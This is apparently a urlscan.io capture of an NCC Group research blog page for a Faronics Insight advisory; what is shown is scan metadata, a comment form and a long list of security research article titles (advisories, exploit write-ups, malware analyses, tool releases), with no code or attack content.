research.nccgroup.com
Open in
urlscan Pro
192.0.78.173
Public Scan
URL:
https://research.nccgroup.com/2023/05/30/technical-advisory-multiple-vulnerabilities-in-faronics-insight/
Submission: On June 02 via api from TR — Scanned from DE
Submission: On June 02 via api from TR — Scanned from DE
Form analysis 1 forms found in the DOM
<form id="jp-carousel-comment-form">
<label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label>
<textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..."></textarea>
<div id="jp-carousel-comment-form-submit-and-info-wrapper">
<div id="jp-carousel-comment-form-commenting-as">
<fieldset>
<label for="jp-carousel-comment-form-email-field">Email (Required)</label>
<input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-author-field">Name (Required)</label>
<input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-url-field">Website</label>
<input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field">
</fieldset>
</div>
<input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment">
</div>
</form>Text Content
* Eurocrypt 2023: Death of a KEM
* Reverse Engineering Coin Hunt World’s Binary Protocol
* Technical Advisory – Multiple Vulnerabilities in Faronics Insight
(CVE-2023-28344, CVE-2023-28345, CVE-2023-28346, CVE-2023-28347,
CVE-2023-28348, CVE-2023-28349, CVE-2023-28350, CVE-2023-28351,
CVE-2023-28352, CVE-2023-28353)
* Tool Release: Code Query (cq)
* CowCloud
* OffensiveCon 2023 – Exploit Engineering – Attacking the Linux Kernel
* Tool Release: Code Credential Scanner (ccs)
* Exploring Overfitting Risks in Large Language Models
* The Paillier Cryptosystem with Applications to Threshold ECDSA
* Rigging the Vote: Uniqueness in Verifiable Random Functions
* Medical Devices: A Hardware Security Perspective
* NETGEAR Routers: A Playground for Hackers?
* Real World Cryptography Conference 2023 – Part I
* Public Report – AWS Nitro System API & Security Claims
* State of DNS Rebinding in 2023
* Machine Learning 103: Exploring LLM Code Generation
* HITBAMS – Your Not so “Home” Office – Soho Hacking at Pwn2Own
* Public Report – Kubernetes 1.24 Security Audit
* Public Report – Solana Program Library ZK-Token Security Assessment
* Stepping Insyde System Management Mode
* Breaking Pedersen Hashes in Practice
* A Race to Report a TOCTOU: Analysis of a Bug Collision in Intel SMM
* Making New Connections – Leveraging Cisco AnyConnect Client to Drop and Run
Payloads
* A Primer On Slowable Encoders
* Threat Spotlight – Hydra
* Rustproofing Linux (Part 4/4 Shared Memory)
* Rustproofing Linux (Part 3/4 Integer Overflows)
* Security Code Review With ChatGPT
* Rustproofing Linux (Part 2/4 Race Conditions)
* Readable Thrift
* Building WiMap the Wi-Fi Mapping Drone
* Fuzzing the Easy Way Using Zulu
* Exploiting CVE-2014-0282
* Rustproofing Linux (Part 1/4 Leaking Addresses)
* Machine Learning 102: Attacking Facial Authentication with Poisoned Data
* Threat Modelling Cloud Platform Services by Example: Google Cloud Storage
* Using Semgrep with Jupyter Notebook files
* Announcing NCC Group’s Cryptopals Guided Tour: Set 2
* Technical Advisory – U-Boot – Unchecked Download Size and Direction in USB
DFU (CVE-2022-2347)
* Technical Advisory – Multiple Vulnerabilities in the Galaxy App Store
(CVE-2023-21433, CVE-2023-21434)
* Project Bishop: Clustering Web Pages
* Puckungfu: A NETGEAR WAN Command Injection
* MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
* Machine Learning 101: The Integrity of Image (Mis)Classification?
* Replicating CVEs with KLEE
* Public Report – VPN by Google One Security Assessment
* Public Report – Confidential Space Security Review
* Exploring Prompt Injection Attacks
* Impersonating Gamers With GPT-2
* So long and thanks for all the 0day
* A jq255 Elliptic Curve Specification, and a Retrospective
* Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)
* Tool Release – Web3 Decoder Burp Suite Extension
* Tales of Windows detection opportunities for an implant framework
* Check out our new Microcorruption challenges!
* Toner Deaf – Printing your next persistence (Hexacon 2022)
* Technical Advisory – OpenJDK – Weak Parsing Logic in java.net.InetAddress and
Related Classes
* Public Report – IOV Labs powHSM Security Assessment
* Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and
CSF Tampering on NXP i.MX Devices
* A glimpse into the shadowy realm of a Chinese APT: detailed analysis of a
ShadowPad intrusion
* Detecting Mimikatz with Busylight
* Whitepaper – Project Triforce: Run AFL On Everything (2017)
* Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
* Technical Advisory – Multiple Vulnerabilities in Juplink RX4-1800 WiFi Router
(CVE-2022-37413, CVE-2022-37414)
* A Guide to Improving Security Through Infrastructure-as-Code
* Tool Release – ScoutSuite 5.12.0
* Public Report – Penumbra Labs Decaf377 Implementation and Poseidon Parameter
Selection Review
* Tool Release – Monkey365
* Sharkbot is back in Google Play
* Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
* There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities
* Conference Talks – September/October 2022
* SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
* Writing FreeBSD Kernel Modules in Rust
* NCC Con Europe 2022 – Pwn2Own Austin Presentations
* Tool Release – JWT-Reauth
* Back in Black: Unlocking a LockBit 3.0 Ransomware Attack
* Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
* Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study
* Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath
* Top of the Pops: Three common ransomware entry techniques
* NCC Group Research at Black Hat USA 2022 and DEF CON 30
* Tool Release – insject: A Linux Namespace Injector
* Technical Advisory – Multiple vulnerabilities in Nuki smart locks
(CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507,
CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508,
CVE-2022-32505)
* NIST Selects Post-Quantum Algorithms for Standardization
* Climbing Mount Everest: Black-Byte Bytes Back?
* Five Essential Machine Learning Security Papers
* Whitepaper – Practical Attacks on Machine Learning Systems
* Flubot: the evolution of a notorious Android Banking Malware
* A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would
have prevented
* Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control
link
* Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities
in U-Boot (CVE-2022-30790, CVE-2022-30552)
* Understanding the Impact of Ransomware on Patient Outcomes – Do We Know
Enough?
* Public Report – Threshold ECDSA Cryptography Review
* Exception Handling and Data Integrity in Salesforce
* Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi
Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328,
CVE-2022-30329)
* Shining the Light on Black Basta
* Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790,
CVE-2022-30552)
* NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible
Reports through the Intel Circuit Breaker program
* Conference Talks – June 2022
* Hardware Security By Design: ESP32 Guidance
* Public Report – Lantern and Replica Security Assessment
* NCC Group’s Juan Garrido named to Microsoft’s MSRC Office Security Researcher
Leaderboard
* Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 –
Unauthenticated Command Injection ( CVE-2022-31794 and CVE-2022-31795)
* Public Report – go-cose Security Assessment
* Technical Advisory – SerComm h500s – Authenticated Remote Command Execution
(CVE-2021-44080)
* Metastealer – filling the Racoon void
* earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s
decompiler internals to make automatic P-Code analysis scripts
* Tool Release – Ghostrings
* Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo
Smart Locks Vulnerable to Relay Attacks
* Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to
Relay Attacks
* Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
* Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView
tag helpers (CVE-2022-27777)
* North Korea’s Lazarus: their initial access trade-craft using social media
and social engineering
* Adventures in the land of BumbleBee – a new malicious loader
* LAPSUS$: Recent techniques, tactics and procedures
* Real World Cryptography Conference 2022
* Mitigating the top 10 security threats to GCP using the CIS Google Cloud
Platform Foundation Benchmark
* A brief look at Windows telemetry: CIT aka Customer Interaction Tracker
* Public Report – Google Enterprise API Security Assessment
* Conti-nuation: methods and techniques observed in operations post the leaks
* Whitepaper – Double Fetch Vulnerabilities in C and C++
* Mining data from Cobalt Strike beacons
* Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
* Tool Release – ScoutSuite 5.11.0
* Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)
* Microsoft announces the WMIC command is being retired, Long Live PowerShell
* SharkBot: a “new” generation Android banking Trojan being distributed on
Google Play Store
* Estimating the Bit Security of Pairing-Friendly Curves
* Detecting anomalous Vectored Exception Handlers on Windows
* BrokenPrint: A Netgear stack overflow
* Hardware & Embedded Systems: A little early effort in security can return a
huge payoff
* Public Report – O(1) Labs Mina Client SDK, Signature Library and Base
Components Cryptography and Implementation Review
* Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark
MC3224i printer (part 2)
* Shaking The Foundation of An Online Collaboration Tool: Microsoft 365 Top 5
Attacks vs the CIS Microsoft 365 Foundation Benchmark
* Bypassing software update package encryption – extracting the Lexmark MC3224i
printer firmware (part 1)
* Detecting Karakurt – an extortion focused threat actor
* BAT: a Fast and Small Key Encapsulation Mechanism
* Testing Infrastructure-as-Code Using Dynamic Tooling
* Machine Learning for Static Analysis of Malware – Expansion of Research Scope
* 10 real-world stories of how we’ve compromised CI/CD pipelines
* NCC Group’s 2021 Annual Research Report
* On the malicious use of large language models like GPT-3
* Exploring the Security & Privacy of Canada’s Digital Proof of Vaccination
Programs
* Tool Update – ruby-trace: A Low-Level Tracer for Ruby
* Tool Release – shouganaiyo-loader: A Tool to Force JVM Attaches
* Technical Advisory – Lenovo ImController Local Privilege Escalation
(CVE-2021-3922, CVE-2021-3969)
* Choosing the Right MCU for Your Embedded Device — Desired Security Features
of Microcontrollers
* FPGAs: Security Through Obscurity?
* Public Report – WhatsApp opaque-ke Cryptographic Implementation Review
* log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
* Log4Shell: Reconnaissance and post exploitation network detection
* Announcing NCC Group’s Cryptopals Guided Tour!
* Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Arbitrary
File Deletion
* Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Stored XSS
* Technical Advisory – SonicWall SMA 100 Series – Multiple Unauthenticated
Heap-based and Stack-based Buffer Overflow (CVE-2021-20045)
* Technical Advisory – SonicWall SMA 100 Series – Post-Authentication Remote
Command Execution (CVE-2021-20044)
* Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow
(CVE-2021-20043)
* Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload
Path Traversal (CVE-2021-20040)
* Why IoT Security Matters
* Technical Advisory – Authenticated SQL Injection in SOAP Request in Broadcom
CA Network Flow Analysis (CVE-2021-44050)
* Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates
with the Half-Space-Trees Algorithm
* Tracking a P2P network related to TA505
* Conference Talks – December 2021
* Public Report – Zendoo Proof Verifier Cryptography Review
* An Illustrated Guide to Elliptic Curve Cryptography Validation
* Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks
* POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides
* Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router
(CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)
* “We wait, because we know you.” Inside the ransomware negotiation economics.
* Detection Engineering for Kubernetes clusters
* Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain
* Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA
Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568,
CVE-2021-43571)
* TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial
access
* Public Report – Zcash NU5 Cryptography Review
* The Next C Language Standard (C23)
* Conference Talks – November 2021
* Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)
* Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment
* Cracking RDP NLA Supplied Credentials for Threat Intelligence
* Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the
Internet
* Enterprise-scale seamless onboarding and deployment of Azure Sentinel using
Lighthouse for multi-tenant environments
* Cracking Random Number Generators using Machine Learning – Part 2: Mersenne
Twister
* Cracking Random Number Generators using Machine Learning – Part 1:
xorshift128
* NCC Group placed first in global 5G Cyber Security Hack competition
* Paradoxical Compression with Verifiable Delay Functions
* A Look At Some Real-World Obfuscation Techniques
* SnapMC skips ransomware, steals data
* The Challenges of Fuzzing 5G Protocols
* Reverse engineering and decrypting CyberArk vault credential files
* Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session
Establishment on UPF (CVE-2021-41794)
* Assessing the security and privacy of Vaccine Passports
* Technical Advisory – NULL Pointer Derefence in McAfee Drive
Encryption (CVE-2021-23893)
* Conference Talks – October 2021
* Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)
* Detecting and Hunting for the PetitPotam NTLM Relay Attack
* Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI
(CVE-2021-39307)
* Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly
* CertPortal: Building Self-Service Secure S/MIME Provisioning Portal
* NSA & CISA Kubernetes Security Guidance – A Critical Review
* Technical Advisory – New York State Excelsior Pass Vaccine Passport
Credential Forgery
* Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner
App Sends Data to a Third Party not Specified in Privacy Policy
* Conference Talks – September 2021
* The ABCs of NFC chip security
* CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2
* Disabling Office Macros to Reduce Malware Infections
* Some Musings on Common (eBPF) Linux Tracing Bugs
* Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive
Extraction – CVE-2021-22937 (Patch Bypass)
* Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection
(CVE-2021-36380)
* Practical Considerations of Right-to-Repair Legislation
* Technical Advisory – ICTFAX 7-4 – Indirect Object Reference
* Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log
Server (CVE-2021-35478,CVE-2021-35479)
* Detecting and Hunting for the Malicious NetFilter Driver
* CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1
* NCC Group Research at Black Hat USA 2021 and DEF CON 29
* Alternative Approaches for Fault Injection Countermeasures (Part 3/3)
* Software-Based Fault Injection Countermeasures (Part 2/3)
* An Introduction to Fault Injection (Part 1/3)
* Technical Advisory – Arbitrary File Read in Dell Wyse Management Suite
(CVE-2021-21586, CVE-2021-21587)
* Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare
vCenter Server 7.0
* Technical Advisory – Shop app sends pasteboard data to Shopify’s servers
* Tool Release – Reliably-checked String Library Binding
* Are you oversharing (in Salesforce)? Our new tool could sniff it out!
* Exploit mitigations: keeping up with evolving and complex software/hardware
* NCC Group co-signs the Electronic Frontier Foundation’s Statement on DMCA Use
Against Security Researchers
* Handy guide to a new Fivehands ransomware variant
* On the Use of Pedersen Commitments for Confidential Payments
* Incremental Machine Learning by Example: Detecting Suspicious Activity with
Zeek Data Streams, River, and JA3 Hashes
* Testing Two-Factor Authentication
* Optimizing Pairing-Based Cryptography: Montgomery Arithmetic in Rust
* Research Paper – Machine Learning for Static Malware Analysis, with
University College London
* Conference Talks – June 2021
* Public Report – Protocol Labs Groth16 Proof Aggregation: Cryptography and
Implementation Review
* iOS User Enrollment and Trusted Certificates
* Detecting Rclone – An Effective Tool for Exfiltration
* Supply Chain Security Begins with Secure Software Development
* Toxic Tokens: Using UUIDs for Authorization is Dangerous (even if they’re
cryptographically random)
* Public Report – Dell Secured Component Verification
* RM3 – Curiosities of the wildest banking malware
* Conference Talks – May 2021
* A Census of Deployed Pulse Connect Secure (PCS) Versions
* NCC Group’s Upcoming Trainings at Black Hat USA 2021
* Public Report – VPN by Google One: Technical Security & Privacy Assessment
* Technical Advisory – ParcelTrack sends all pasteboard data to ParcelTrack’s
servers on startup
* Tool Release – Principal Mapper v1.1.0 Update
* SAML XML Injection
* The Future of C Code Review
* RIFT: Detection capabilities for recent F5 BIG-IP/BIG-IQ iControl REST API
vulnerabilities CVE-2021-22986
* Tool Release – Solitude: A privacy analysis tool
* Deception Engineering: exploring the use of Windows Installer Packages
against first stage payloads
* Lending a hand to the community – Covenant v0.7 Updates
* Technical Advisory: Dell SupportAssist Local Privilege Escalation
(CVE-2021-21518)
* Technical Advisory – Multiple Vulnerabilities in Netgear ProSAFE Plus
JGS516PE / GS116Ev2 Switches
* Deception Engineering: exploring the use of Windows Service Canaries against
ransomware
* Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes
* Technical Advisory: Administrative Passcode Recovery and Authenticated Remote
Buffer Overflow Vulnerabilities in Gigaset DX600A Handset (CVE-2021-25309,
CVE-2021-25306)
* Cryptopals: Exploiting CBC Padding Oracles
* Investigating Potential Security Vulnerability Manifestation through Various
Analyses & Inferences Regarding Internet RFCs (and how RFC Security might be
Improved)
* NCC Group’s 2020 Annual Research Report
* Conference Talks – February/March 2021
* Software Verification and Analysis Using Z3
* Technical Advisory – Linksys WRT160NL – Authenticated Command Injection
(CVE-2021-25310)
* Real World Cryptography Conference 2021: A Virtual Experience
* RIFT: Analysing a Lazarus Shellcode Execution Method
* MSSQL Lateral Movement
* Public Report – BLST Cryptographic Implementation Review
* Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures
* Abusing cloud services to fly under the radar
* Building an RDP Credential Catcher for Threat Intelligence
* Double-odd Elliptic Curves
* Using AWS and Azure for Cost Effective Log Ingestion with Data Processing
Pipelines for SIEMs
* Domestic IoT Nightmares: Smart Doorbells
* Technical Advisory: OS Command Injection in Silver Peak EdgeConnect
Appliances (CVE-2020-12148, CVE-2020-12149)
* Helping Engineering Teams Tackle Security Debt in Embedded Systems: U-Boot
Configuration Auditing Introduced in Depthcharge v0.2.0
* An Adventure in Contingency Debugging: Ruby IO#read/IO#write Considered
Harmful
* ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again
* Tool Release – HTTPSignatures: A Burp Suite Extension Implementing HTTP
Signatures
* ICS/OT Security & the evolution of the Purdue Model: Integrating Industrial
and Business Networks
* Tool Release – Carnivore: Microsoft External Assessment Tool
* Technical Advisory: containerd – containerd-shim API Exposed to Host Network
Containers (CVE-2020-15257)
* Conference Talks – December 2020
* TA505: A Brief History Of Their Time
* Decrypting OpenSSH sessions for fun and profit
* Past, Present and Future of Effective C
* Technical Advisory: SQL Injection and Reflected Cross-Site Scripting (XSS)
Vulnerabilities in Oracle Communications Diameter Signaling Router
(CVE-2020-14787, CVE-2020-14788)
* Technical Advisory: Command Injection
* Conference Talks – November 2020
* Technical Advisory: Pulse Connect Secure – Arbitrary File Read via Logon
Message (CVE-2020-8255)
* Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Gzip
Extraction (CVE-2020-8260)
* Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code
Execution (CVE-2020-27162)
* Technical Advisory – Jitsi Meet Electron – Limited Certificate Validation
Bypass (CVE-2020-27161)
* Public Report – Filecoin Bellman and BLS Signatures Cryptographic Review
* Technical Advisory – Linksys WRT160NL – Authenticated Remote Buffer Overflow
(CVE-2020-26561)
* There’s A Hole In Your SoC: Glitching The MediaTek BootROM
* RIFT: F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and
CVE-2020-8196 honeypot data release
* Technical Advisory – Pulse Connect Secure – RCE via Template Injection
(CVE-2020-8243)
* Tool – Windows Executable Memory Page Delta Reporter
* Salesforce Security with Remote Working
* Tool Release – ScoutSuite 5.10
* Conference Talks – October 2020
* Tool Release – ICPin, an integrity-check and anti-debug detection pintool
* Faster Modular Inversion and Legendre Symbol, and an X25519 Speed Record
* Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP
Method Interchange (CVE-2020-13658)
* Online Casino Roulette – A guideline for penetration testers and security
researchers
* Extending a Thinkst Canary to become an interactive honeypot
* StreamDivert: Relaying (specific) network connections
* Public Report – Electric Coin Company NU4 Cryptographic Specification and
Implementation Review
* Machine learning from idea to reality: a PowerShell case study
* Conference Talks – September 2020
* Whitepaper – Exploring the Security of KaiOS Mobile Applications
* Technical Advisory – wolfSSL TLS 1.3 Client Man-in-the-Middle Attack
(CVE-2020-24613)
* Technical Advisory – Multiple HTML Injection Vulnerabilities in KaiOS
Pre-installed Mobile Applications
* Technical Advisory – FreePBX – Multiple Authenticated SQL Injections in UCP
application
* Immortalising 20 Years of Epic Research
* Pairing over BLS12-381, Part 3: Pairing!
* Public Report – Pixel 4/4XL and Pixel 4a ioXt Audit
* NCC Group researchers named amongst MSRC’s Most Valuable Security Researchers
in 2020
* Lights, Camera, HACKED! An insight into the world of popular IP Cameras
* Conference Talks – August 2020
* Tool Release – Winstrument: An Instrumentation Framework for Windows
Application Assessments
* Tool Release: Sinking U-Boots with Depthcharge
* Technical Advisory: Heartbleed chained with a Pass-the-Hash attack leads to
device compromise on TP-Link C200 IP Camera
* Public Report – Qredo Apache Milagro MPC Cryptographic Assessment
* Pairing over BLS12-381, Part 2: Curves
* Understanding the root cause of F5 Networks K52145254: TMUI RCE vulnerability
CVE-2020-5902
* RIFT: Citrix ADC Vulnerabilities CVE-2020-8193, CVE-2020-8195 and
CVE-2020-8196 Intelligence
* An offensive guide to the Authorization Code grant
* Technical Advisory – KwikTag Web Admin Authentication Bypass
* Pairing over BLS12-381, Part 1: Fields
* RIFT: F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902
Intelligence
* Experiments in Extending Thinkst Canary – Part 1
* Tool Release – ScoutSuite 5.9.0
* Technical Advisory – macOS Installer Local Root Privilege Escalation
(CVE-2020-9817)
* Paper: Thematic for Success in Real-World Offensive Cyber Operations – How to
make threat actors work harder and fail more often
* How-to: Importing WStalker CSV (and more) into Burp Suite via Import to
Sitemap Extension
* Tool: WStalker – an easy proxy to support Web API assessments
* Security Considerations of zk-SNARK Parameter Multi-Party Computation
* WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group
* Tool Release – Socks Over RDP Now Works With Citrix
* Striking Back at Retired Cobalt Strike: A look at a legacy vulnerability
* Technical Advisory – ARM MbedOS USB Mass Storage Driver Memory Corruption
* Cyber Security of New Space Paper
* In-depth analysis of the new Team9 malware family
* Common Insecure Practices with Configuring and Extending Salesforce
* Exploring DeepFake Capabilities & Mitigation Strategies with University
College London
* Game Security
* Exploring macOS Calendar Alerts: Part 2 – Exfiltrating data (CVE-2020-3882)
* Research Report – Zephyr and MCUboot Security Assessment
* CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a
better read/write primitive
* CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read
and write primitive
* Using SharePoint as a Phishing Platform
* Public Report – Coda Cryptographic Review
* Shell Arithmetic Expansion and Evaluation Abuse
* CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition
and debugging tricks
* Tool Release – Socks Over RDP
* Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code
* CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic
triggering
* Practical Machine Learning for Random (Filename) Detection
* Curve9767 and Fast Signature Verification
* CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction
* The Extended AWS Security Ramp-Up Guide
* Code Patterns for API Authorization: Designing for Security
* Order Details Screens and PII
* How cryptography is used to monitor the spread of COVID-19
* Rise of the Sensors: Securing LoRaWAN Networks
* C Language Standards Update – Zero-size Reallocations are Undefined Behavior
* IETF Draft: Indicators of Compromise and Their Role in Attack and Defen[c|s]e
* Exploring Verifiable Random Functions in Code
* Crave the Data: Statistics from 1,300 Phishing Campaigns
* Impact of DNS over HTTPS (DoH) on DNS Rebinding Attacks
* Tool Release – ScoutSuite 5.8.0
* Whitepaper – Coinbugs: Enumerating Common Blockchain Implementation-Level
Vulnerabilities
* Smart Contracts Inside SGX Enclaves: Common Security Bug Patterns
* LDAPFragger: Bypassing network restrictions using LDAP attributes
* Threat Actors: exploiting the pandemic
* A Survey of Istio’s Network Security Features
* Conference Talks – March 2020
* Public Report – RustCrypto AES/GCM and ChaCha20+Poly1305 Implementation
Review
* Reviewing Verifiable Random Functions
* CVE-2018-8611 – Diving into the Windows Kernel Transaction Manager (KTM) for
fun and exploitation
* Whitepaper – Microcontroller Readback Protection: Bypasses and Defenses
* Improving Software Security through C Language Standards
* Whitepaper – A Tour of Curve 25519 in Erlang
* Deep Dive into Real-World Kubernetes Threats
* Technical Advisory – playSMS Pre-Authentication Remote Code Execution
(CVE-2020-8644)
* Interfaces.d to RCE
* Properly Signed Certificates on CPE Devices
* Conference Talks – February 2020
* Tool Release – Collaborator++
* Public Report – Electric Coin Company NU3 Specification and Blossom
Implementation Audit
* Tool Release – Enumerating Docker Registries with go-pillage-registries
* Conference Talks – January 2020
* Passive Decryption of Ethereum Peer-to-Peer Traffic
* On Linux’s Random Number Generation
* Demystifying AWS’ AssumeRole and sts:ExternalId
* Welcome to the new NCC Group Global Research blog
* Technical Advisory: Gaining root access on Sumpple S610 IP Camera via Telnet;
and Unprotected client and server data transmission between Android and IOS
clients
* Security impact of IoT on the Enterprise
* Secure Device Provisioning Best Practices: Heavy Truck Edition
* CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device
Host Service and the Update Orchestrator Service
* Padding the struct: How a compiler optimization can disclose stack memory
* Embedded Device Security Certifications
* An Introduction to Ultrasound Security Research
* PhanTap (Phantom Tap): Making networks spookier one packet at a time
* An Introduction to Quantum Computing for Security Professionals
* Sniffle: A Sniffer for Bluetooth 5
* Compromising a Hospital Network for £118 (Plus Postage & Packaging)
* Getting Shell with XAMLX Files
* Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to
a Privilege Escalation
* Technical Advisory: CyberArk EPM Non-paged Pool Buffer Overflow
* Technical Advisory: Unauthenticated SQL Injection in Lansweeper
* Jenkins Plugins and Core Technical Summary Advisory
* Technical Advisory: Multiple Vulnerabilities in Ricoh Printers
* Technical Advisory: Multiple Vulnerabilities in Brother Printers
* Technical Advisory: Multiple Vulnerabilities in Xerox Printers
* Technical Advisory: Multiple Vulnerabilities in Kyocera Printers
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 10: Efficacy Demonstration, Project Conclusion and
Next Steps
* Technical Advisory: Multiple Vulnerabilities in HP Printers
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 9: Adventures with Expert Systems
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 8: Development of Prototype #4 – Building on
Takaesu’s Approach with Focus on XSS
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 7: Development of Prototype #3 – Adventures in
Anomaly Detection
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 6: Development of Prototype #2 – Creating a SQLi PoC
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 5: Development of Prototype #1 – Text Processing and
Semantic Relationships
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 4: Architecture and Design
* Technical Advisory – Authorization Bypass Allows for Pinboard Corruption
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 3: Understanding Existing Approaches and Attempts
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 2: Going off on a Tangent – AI/ML Applications in
Social Engineering
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 1: Understanding the Basics and What Platforms and
Frameworks Are Available
* Technical Advisory: Multiple Vulnerabilities in Lexmark Printers
* Technical Advisory: Intel Driver Support & Assistance – Local Privilege
Escalation
* Technical Advisory: Citrix Workspace / Receiver Remote Code Execution
Vulnerability
* The Sorry State of Aftermarket Head Unit Security
* Cyber Security in UK Agriculture
* NCC Group Connected Health Whitepaper July 2019
* Story of a Hundred Vulnerable Jenkins Plugins
* Whitepaper – Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s
TrustZone
* Technical Advisory: Multiple Vulnerabilities in SmarterMail
* Technical Advisory – DelTek Vision – Arbitrary SQL Execution (SQLi)
* eBPF Adventures: Fiddling with the Linux Kernel and Unix Domain Sockets
* Chafer backdoor analysis
* Finding and Exploiting .NET Remoting over HTTP using Deserialisation
* Technical Advisory: Multiple Vulnerabilities in MailEnable
* Assessing Unikernel Security
* Technical Advisory: IP Office Stored Cross Site Scripting (XSS) Vulnerability
* Zcash Overwinter Consensus and Sapling Cryptography Review
* Xendbg: A Full-Featured Debugger for the Xen Hypervisor
* Use of Deserialisation in .NET Framework Methods and Classes
* Owning the Virgin Media Hub 3.0: The perfect place for a backdoor
* Nine years of bugs at NCC Group
* The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations
* Third party assurance
* Turla PNG Dropper is back
* Public cloud
* Android Cloud Backup/Restore
* Spectre on a Television
* RokRat Analysis
* Technical Advisory: SMB Hash Hijacking and User Tracking in MS Outlook
* Technical Advisory: Authentication Bypass in libSSH
